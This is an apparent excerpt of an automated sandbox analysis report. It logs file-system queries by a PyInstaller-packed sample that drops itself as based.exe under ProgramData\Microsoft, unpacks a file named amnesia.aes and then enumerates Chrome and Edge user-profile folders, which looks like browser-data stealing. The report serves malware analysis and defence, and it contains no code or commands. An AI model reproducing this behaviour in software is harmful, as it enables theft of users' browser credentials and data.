Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\Desktop\iqA8j9yGcd.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\amnesia.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\libssl-3.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\python311.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\amnesia.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\amnesia.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\amnesia.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\amnesia.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\amnesia.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\amnesia.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\amnesia.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\select.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformation	Jump to behavior
